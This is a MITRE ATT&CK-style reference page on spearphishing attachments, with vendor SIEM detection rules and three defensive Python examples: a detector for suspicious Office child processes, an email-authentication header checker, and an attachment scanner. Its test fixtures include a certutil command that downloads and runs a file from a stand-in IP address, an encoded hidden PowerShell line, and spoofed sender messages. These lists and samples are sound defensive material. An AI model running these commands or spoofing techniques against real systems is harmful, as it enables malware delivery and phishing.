T1566.001: Spearphishing Attachment

Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing; it differs from other forms in that the malware arrives as a file attached to the email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon User Execution to gain execution. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.

There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.

Positive Technologies products that cover the technique

MaxPatrol SIEM knowledge base

unix_mitre_attck_initial_access: PT-CR-2477: Unix_Process_Started_Via_Office_Macros: A process was started using a LibreOffice macro
mitre_attck_persistence: PT-CR-2649: Outlook_Form_Exploitation: Outlook started a suspicious process after a custom form was created in the Outlook client. This may indicate an attacker's attempt to gain persistence in the system or execute arbitrary code.
mitre_attck_initial_access: PT-CR-2416: Start_Process_From_MOTW_Archive: A user opened an encrypted ZIP archive using a native OS tool and launched a file
mitre_attck_initial_access: PT-CR-2447: WMI_Execution_Via_VBA_Macro: A process was created using a Windows Management Instrumentation command from a Microsoft Office document macro
mitre_attck_initial_access: PT-CR-2301: Suspicious_File_Creation_From_Messenger_Or_Mail: A file with a suspicious extension was created on behalf of an instant messenger or email program, or malicious file activity was detected. This may indicate a phishing attack or malware being delivered to the user's computer.
mitre_attck_initial_access: PT-CR-2945: Potential_Rogue_RDP_Attack: A user opened a file with the .rdp extension and established an RDP connection. This may indicate a Rogue RDP attack that can result in data leakage via a fake RDP connection.
vulnerabilities: PT-CR-1375: Windows_Contacts_RCE: Possible exploitation of vulnerability CVE-2022-44666 in Windows Contacts
vulnerabilities: PT-CR-892: Possible_CVE_2021_1647: Possible exploitation of vulnerability CVE-2021-1647 in Windows Defender
vulnerabilities: PT-CR-779: MSDT_CVE_2022_30190: The ms-msdt protocol was used to exploit vulnerability CVE-2022-30190 (Follina) in Microsoft Support Diagnostic Tool (MSDT)
mitre_attck_execution: PT-CR-605: Office_File_With_Macros: A user opened a Microsoft Office document with a macro
mitre_attck_execution: PT-CR-345: Malicious_Office_Document: A suspicious sequence of process startups by a Microsoft Office application was detected
mitre_attck_execution: PT-CR-648: Suspicious_Child_From_Messenger_Process: A user started a process from a parent messenger process
mitre_attck_execution: PT-CR-2664: Outlook_VBA_Addin_Load: The Outlook process loaded the library "Microsoft VBA for Outlook Addin" (OUTLVBA.DLL). This may indicate the use of VBA macros to execute arbitrary code.
process_chains_and_logons: PT-CR-1213: Suspicious_Messenger_Process_Chain: Suspicious process start chain for instant messenger programs
process_chains_and_logons: PT-CR-950: Suspicious_Office_Process_Chain: Suspicious process start chain for Microsoft Office or Adobe Acrobat applications
yandex_360: PT-CR-2472: Yandex_360_Spam_Attack_By_Title: Multiple emails with the same subject in Yandex 360, which may indicate a spam mailing
yandex_360: PT-CR-2473: Yandex_360_Spam_Attack_By_Source: Multiple emails from the same sender in Yandex 360, which may indicate a spam mailing
postfix: PT-CR-2711: Postfix_Suspicious_Sender: Unusual characters in a sender's address. This may indicate exploitation of vulnerability CVE-2020-12063, which allows visually spoofing another sender's address and sending a message without authentication.
postfix: PT-CR-2712: Postfix_Message_From_Wrong_Username: The email address of a sender does not match their authentication data. This could be a phishing attempt.
hacking_tools: PT-CR-2870: PhantomCore_Tools_Usage: Activity specific to the PhantomRAT remote access trojan or its loader PhantomDL. Signs of activity: DNS queries to domains used to determine the public IP address, download of libraries for working with WMI and the network configuration, or a child process started from a double-extension executable to obtain the user's domain.
vk_workmail: PT-CR-2996: VK_Workmail_Emails_Mark_Spam: An email was marked as spam. This may indicate a phishing or malicious content distribution attempt.
vk_workmail: PT-CR-2998: VK_Workmail_User_Marked_As_Spammer: A user was marked as a spammer. This may indicate a phishing or malicious content distribution attempt.
antimalware: PT-CR-2080: KSMG_Malware_Detect_And_Clean: A malicious object was found in an email and cleaned
antimalware: PT-CR-727: Sandbox_Spam_Attack_By_Source: Spam delivery from the same sender was detected
antimalware: PT-CR-726: Sandbox_Spam_Attack_By_Attachment: Spam delivery with the same attachment was detected
antimalware: PT-CR-745: Subrule_Sandbox_Mail_IP: A PT Sandbox event is supplemented with IP address information
antimalware: PT-CR-1770: Subrule_Sandbox_Count_Mail_Attachments: A PT Sandbox event is supplemented with attachment count information
antimalware: PT-CR-3008: Spam_Mail_Detected: An email that may be spam was detected and marked as spam
antimalware: PT-CR-729: Subrule_Sandbox_Mail_Attachment: A PT Sandbox event is supplemented with attachment information
antimalware: PT-CR-728: Sandbox_Spam_Attack_By_Title: Spam delivery with the same subject was detected
antimalware: PT-CR-723: Subrule_Sandbox_File_Verdict: Result of a file check by PT Sandbox
antimalware: PT-CR-2085: KSMG_Malware_Remove: A malicious object was found and deleted from an email
antimalware: PT-CR-722: Sandbox_Full_Scan_Malware: PT Sandbox detected an unwanted or malicious object
antimalware: PT-CR-2084: KSMG_Encrypted_Message_Detected: An encrypted file object was found in an email

Detection

ID: DS0029
Data source and component: Network Traffic: Network Traffic Flow
Description:

Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.

ID: DS0029
Data source and component: Network Traffic: Network Traffic Content
Description:

Monitor and analyze SSL/TLS traffic patterns and packet contents for protocols that do not follow the expected standards and traffic flows (e.g., extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax or structure). Correlate with process monitoring and command-line logging to detect anomalous process execution and command-line arguments associated with those traffic patterns (e.g., files that do not normally initiate connections for the respective protocol). Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.

ID: DS0015
Data source and component: Application Log: Application Log Content
Description:

Monitor third-party application logs, messaging, and other artifacts for signs of spearphishing emails carrying a malicious attachment. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed. Anti-virus can potentially detect malicious documents and attachments as they are scanned on the email server or on the user's computer. Monitor for suspicious descendant processes spawned by Microsoft Office and other productivity software.
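The "suspicious descendant process" check above, written out as an added example (this is illustrative detection logic, not MaxPatrol SIEM rule code). It runs over constructed process-creation records with Sysmon Event ID 1 style fields; the parent, child and command-line marker sets are assumptions to be tuned per estate. It also covers the WMI case that a plain parent-is-Office rule misses, where a macro calls Win32_Process.Create and the child appears under WmiPrvSE.exe instead.

```python
"""Flag suspicious child processes of productivity software.

Added example (not MaxPatrol SIEM rule code): runs over constructed
process-creation records with Sysmon Event ID 1 style fields.
"""
from dataclasses import dataclass
from typing import List, Optional

# Applications that open user-supplied attachments. Assumption: an illustrative
# set; extend it with whatever opens documents in your estate.
PRODUCTIVITY_PARENTS = {
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe",
    "acrord32.exe", "acrobat.exe", "soffice.bin", "soffice.exe",
}
# Children a document viewer has no business launching directly.
SUSPICIOUS_CHILDREN = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe",
    "msiexec.exe", "wmic.exe", "schtasks.exe", "curl.exe", "mstsc.exe",
}
# Benign children Office is known to spawn (printing, crash reporting).
ALLOWLIST = {"splwow64.exe", "dw20.exe", "werfault.exe"}
# Command-line fragments that raise confidence regardless of the parent.
CMDLINE_MARKERS = ("-enc", "-encodedcommand", "downloadstring", "invoke-expression",
                   "iex ", "frombase64string", "http", "-urlcache", "/c start")


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str
    user: str


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def user_writable(path: str) -> bool:
    """True for locations a phishing payload is typically dropped into."""
    p = path.lower()
    return any(s in p for s in ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\users\\public\\"))


def classify(ev: ProcessEvent) -> Optional[str]:
    """Return a finding for a suspicious process-creation event, else None."""
    parent, child = basename(ev.parent_image), basename(ev.image)
    if child in ALLOWLIST:
        return None
    cl = ev.command_line.lower()
    markers = [m for m in CMDLINE_MARKERS if m in cl]
    if parent in PRODUCTIVITY_PARENTS and child in SUSPICIOUS_CHILDREN:
        tag = "office_lolbin"            # macro or exploit launching a script host / LOLBin
    elif parent in PRODUCTIVITY_PARENTS and user_writable(ev.image):
        tag = "office_dropped_binary"    # document wrote a binary and ran it
    elif parent == "wmiprvse.exe" and child in SUSPICIOUS_CHILDREN and markers:
        # Win32_Process.Create from a macro makes WmiPrvSE the parent, not Office,
        # so require command-line evidence here to keep the false-positive rate down.
        tag = "wmi_child"
    else:
        return None
    suffix = f" [{', '.join(markers)}]" if markers else ""
    return f"{tag}: {parent} -> {child} as {ev.user}{suffix}"


def run(events: List[ProcessEvent]) -> List[str]:
    return [f for f in (classify(e) for e in events) if f]


# Constructed sample events (paths, users and the IP are illustrative).
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0",
                 "CORP\\alice"),
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\splwow64.exe", "splwow64.exe 8192", "CORP\\alice"),
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
                 r"C:\Users\alice\AppData\Local\Temp\update.exe", "update.exe /silent", "CORP\\alice"),
    ProcessEvent(r"C:\Windows\System32\wbem\WmiPrvSE.exe", r"C:\Windows\System32\cmd.exe",
                 r"cmd.exe /c certutil -urlcache -split -f http://198.51.100.7/a.exe %TEMP%\a.exe",
                 "CORP\\bob"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe", "cmd.exe", "CORP\\bob"),
]

if __name__ == "__main__":
    for finding in run(SAMPLE_EVENTS):
        print(finding)
```

The allowlist matters in practice: Office legitimately spawns a handful of helpers, and without it the rule pages on every print job. The `office_dropped_binary` branch catches the case where the child is not a known LOLBin at all, which is how a macro that writes its payload to %TEMP% and runs it looks.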

ID: DS0022
Data source and component: File: File Creation
Description:

Monitor for newly created files originating from a spearphishing email with a malicious attachment (for example, files written by the mail client or messenger when an attachment is saved or opened).

Mitigation

ID: M1049
Name: Antivirus/Antimalware
Description:

Anti-virus can also automatically quarantine suspicious files.

ID: M1031
Name: Network Intrusion Prevention
Description:

Network intrusion prevention systems and systems designed to scan and remove malicious email attachments can be used to block activity.

ID: M1054
Name: Software Configuration
Description:

Use anti-spoofing and email authentication mechanisms to filter messages based on validity checks of the sender domain (using SPF) and integrity of messages (using DKIM). Enabling these mechanisms within an organization (through policies such as DMARC) may enable recipients (intra-org and cross domain) to perform similar message filtering and validation.
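The SPF/DKIM/DMARC validation described here, and the "DKIM+SPF or header analysis" the detection entries above refer to, as an added example (not a mail gateway's or SIEM's code). It reads the Authentication-Results header (RFC 8601) that the organization's own MTA stamped on a message, applies DMARC-style relaxed alignment between the authenticated domains and the From header, and then checks for the display-name and Reply-To tricks that a DMARC pass does not cover. The gateway name `mx.corp.example`, the sample messages and the two-label organizational-domain rule are assumptions.

```python
"""Sender-authentication and header checks for an inbound message.

Added example, not a mail gateway's or SIEM's code. It reads the
Authentication-Results header (RFC 8601) stamped by a trusted MTA and applies
DMARC-style relaxed alignment between the authenticated domains and the From
header, then looks for display-name and Reply-To tricks that DMARC does not cover.
"""
import email
from email import policy
from email.utils import parseaddr


def org_domain(domain: str) -> str:
    """Organizational domain for relaxed alignment.
    Assumption: the two rightmost labels; real DMARC uses the Public Suffix List."""
    labels = domain.lower().strip().split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else domain.lower()


def addr_domain(addr: str) -> str:
    """Domain of 'user@domain'; a bare domain is returned unchanged."""
    return addr.rsplit("@", 1)[-1].lower().strip()


def parse_auth_results(value: str) -> dict:
    """'authserv-id; spf=pass smtp.mailfrom=x; dkim=pass header.d=y' -> {method: (result, props)}."""
    results = {}
    for clause in value.split(";")[1:]:
        tokens = clause.split()
        if not tokens:
            continue
        method, _, result = tokens[0].partition("=")
        props = {k: v for k, _, v in (t.partition("=") for t in tokens[1:])}
        results[method.lower()] = (result.lower(), props)
    return results


def first_address(msg, header: str):
    """(display_name, addr_spec) of the first mailbox in an address header, or ('', '')."""
    addresses = getattr(msg.get(header), "addresses", ())
    if not addresses:
        return "", ""
    return addresses[0].display_name, addresses[0].addr_spec


def assess(raw_message: str, authserv_id: str) -> list:
    """Return a list of findings; an empty list means the checks passed."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    display, from_addr = first_address(msg, "From")
    from_dom = addr_domain(from_addr)
    findings = []

    # Trust only the Authentication-Results header our own gateway wrote. A sender
    # can add one of their own, so the gateway must strip inbound headers carrying
    # its authserv-id before stamping its own.
    trusted = [str(h) for h in msg.get_all("Authentication-Results", [])
               if str(h).split(";", 1)[0].strip().lower() == authserv_id.lower()]
    if not trusted:
        return ["no Authentication-Results from trusted gateway; treat as unauthenticated"]
    results = parse_auth_results(trusted[0])

    # DMARC: at least one of SPF or DKIM must pass for a domain aligned with From.
    spf_result, spf_props = results.get("spf", ("none", {}))
    spf_aligned = (spf_result == "pass" and
                   org_domain(addr_domain(spf_props.get("smtp.mailfrom", ""))) == org_domain(from_dom))
    dkim_result, dkim_props = results.get("dkim", ("none", {}))
    dkim_aligned = (dkim_result == "pass" and
                    org_domain(dkim_props.get("header.d", "")) == org_domain(from_dom))
    if not (spf_aligned or dkim_aligned):
        findings.append(f"dmarc_fail: From domain {from_dom} is not aligned with "
                        f"SPF ({spf_result}) or DKIM ({dkim_result})")

    # Reply-To pointing somewhere else is a common lure for the follow-up conversation.
    _, reply_to = first_address(msg, "Reply-To")
    if reply_to and org_domain(addr_domain(reply_to)) != org_domain(from_dom):
        findings.append(f"reply-to domain {addr_domain(reply_to)} differs from From domain {from_dom}")

    # Display-name spoofing: the visible name carries an address from a domain the real address lacks.
    if "@" in display:
        shown = addr_domain(parseaddr(display)[1])
        if shown and org_domain(shown) != org_domain(from_dom):
            findings.append(f"display name shows {shown} but address domain is {from_dom}")
    return findings


# Constructed sample messages (all domains are illustrative).
LEGIT = """From: Payroll <payroll@corp.example>
To: alice@corp.example
Subject: March payslip
Authentication-Results: mx.corp.example; spf=pass smtp.mailfrom=bounce@em.corp.example; dkim=pass header.d=corp.example header.s=sel1; dmarc=pass
Content-Type: text/plain

Your payslip is attached.
"""

DIRECT_SPOOF = """From: CEO <ceo@corp.example>
To: bob@corp.example
Subject: Urgent invoice
Authentication-Results: mx.corp.example; spf=fail smtp.mailfrom=ceo@corp.example; dkim=none
Content-Type: text/plain

Open the attached invoice today.
"""

DISPLAY_SPOOF = """From: "IT Helpdesk <helpdesk@corp.example>" <alerts@mail-notify.example>
Reply-To: support@reply-desk.example
To: alice@corp.example
Subject: Password expiry notice
Authentication-Results: mx.corp.example; spf=pass smtp.mailfrom=bounce@mail-notify.example; dkim=pass header.d=mail-notify.example; dmarc=pass
Content-Type: text/plain

See the attached form.
"""

FORGED_AR = """From: Finance <finance@corp.example>
To: bob@corp.example
Subject: Statement
Authentication-Results: attacker.example; spf=pass smtp.mailfrom=finance@corp.example; dkim=pass header.d=corp.example
Content-Type: text/plain

Statement attached.
"""

if __name__ == "__main__":
    for label, raw in (("legit", LEGIT), ("direct", DIRECT_SPOOF),
                       ("display", DISPLAY_SPOOF), ("forged-ar", FORGED_AR)):
        print(label, "->", assess(raw, "mx.corp.example") or "ok")
```

The DISPLAY_SPOOF case is the one to note: SPF and DKIM both pass and are aligned, because the attacker authenticates their own domain, so DMARC is satisfied and only the display-name and Reply-To checks fire. DMARC stops direct From-domain forgery; it does not stop lookalike or display-name lures, which is why header analysis is listed alongside it.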

ID: M1017
Name: User Training
Description:

Users can be trained to identify social engineering techniques and spearphishing emails.

ID: M1021
Name: Restrict Web-Based Content
Description:

As a best practice, block by default attachment types that should not be transmitted over email, such as .scr, .exe, .pif, and .cpl, to cut off some delivery vectors. Some email scanning devices can open and analyze compressed and encrypted formats, such as zip and rar, that may be used to conceal malicious attachments.
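An attachment policy check of the kind described here, as an added example (not a mail gateway's code). It blocks dangerous extensions, catches the double-extension and right-to-left-override renaming tricks from the technique description, descends into ZIP archives with a nesting limit and a decompression-ratio guard, and treats an encrypted entry as unscannable rather than clean. The extension lists, limits and sample attachments are assumptions; the "encrypted" sample is produced by setting the ZIP encryption flag bit by hand, because the stdlib cannot write password-protected entries and the checker only needs the flag.

```python
"""Attachment policy check: blocked types, disguised names and nested archives.

Added example, not a mail gateway's code. Works on an attachment's filename
and raw bytes; ZIP archives are opened in memory with the stdlib zipfile module.
"""
import io
import zipfile

# Assumption: illustrative lists; tune to the estate's policy.
BLOCKED_EXT = {"exe", "scr", "pif", "cpl", "com", "bat", "cmd", "js", "jse", "vbs",
               "vbe", "wsf", "hta", "msi", "lnk", "iso", "img", "vhd", "vhdx", "rdp",
               "dll", "ps1", "jar"}
DOCUMENT_EXT = {"pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "txt", "rtf",
                "jpg", "png"}
MAX_DEPTH = 3      # archive-in-archive levels we are willing to unpack
MAX_RATIO = 100    # decompression ratio above which an entry is treated as a zip bomb
ZIP_MAGIC = b"PK\x03\x04"


def check_name(name: str) -> list:
    """Findings that follow from the filename alone."""
    findings = []
    # U+202E (RLO) makes 'report\u202efdp.scr' render as 'reportrcs.pdf'.
    if "\u202e" in name or "\u202d" in name:
        findings.append("bidi override character in filename")
    parts = name.lower().split(".")
    ext = parts[-1] if len(parts) > 1 else ""
    if ext in BLOCKED_EXT:
        findings.append(f"blocked extension .{ext}")
        if len(parts) > 2 and parts[-2] in DOCUMENT_EXT:
            findings.append("double extension mimicking a document")
    return findings


def check_attachment(name: str, data: bytes, depth: int = 0, path: str = "") -> list:
    """Findings for one attachment, descending into ZIP archives."""
    label = path + name
    findings = [f"{label}: {f}" for f in check_name(name)]
    if not data.startswith(ZIP_MAGIC):
        return findings
    if depth >= MAX_DEPTH:
        return findings + [f"{label}: archive nested deeper than {MAX_DEPTH} levels, blocked"]
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings + [f"{label}: malformed archive, blocked"]
    with zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            inner = f"{label}!{info.filename}"
            if info.flag_bits & 0x1:
                # Encrypted entry: the content cannot be scanned, but the name still can.
                findings.append(f"{inner}: encrypted entry, content not scannable")
                findings.extend(f"{inner}: {f}" for f in check_name(info.filename))
                continue
            if info.compress_size and info.file_size / info.compress_size > MAX_RATIO:
                findings.append(f"{inner}: compression ratio {info.file_size // info.compress_size}:1, blocked")
                continue
            findings.extend(check_attachment(info.filename, zf.read(info), depth + 1, label + "!"))
    return findings


def make_zip(entries: dict) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for member, content in entries.items():
            zf.writestr(member, content)
    return buf.getvalue()


def mark_encrypted(single_entry_zip: bytes) -> bytes:
    """Set general-purpose flag bit 0 ('encrypted') in the local and central headers.
    Constructed stand-in: zipfile cannot write password-protected entries, and the
    checker only inspects the flag, not a real cipher."""
    b = bytearray(single_entry_zip)
    b[b.find(b"PK\x03\x04") + 6] |= 0x01
    b[b.rfind(b"PK\x01\x02") + 8] |= 0x01
    return bytes(b)


# Constructed sample attachments.
SAMPLES = {
    "Invoice_4471.pdf.exe": b"MZ\x90\x00" + b"\x00" * 60,
    "report\u202efdp.scr": b"MZ\x90\x00",
    "docs.zip": make_zip({"Scan.zip": make_zip({"payroll.xlsx.js": b"var a=1;"}),
                          "readme.txt": b"see scan"}),
    "secure.zip": mark_encrypted(make_zip({"statement.pdf.exe": b"MZ\x90\x00"})),
    "photo.jpg": b"\xff\xd8\xff\xe0",
}


def scan_all(samples: dict) -> dict:
    return {name: check_attachment(name, data) for name, data in samples.items()}


if __name__ == "__main__":
    for name, findings in scan_all(SAMPLES).items():
        print(name, "->", findings or "clean")
```

Two design points: a password-protected archive is reported as unscannable rather than passed through, since the whole point of the zip password in the lure is to defeat this scan; and the ratio and depth guards exist because an archive scanner is itself an attack surface for resource exhaustion.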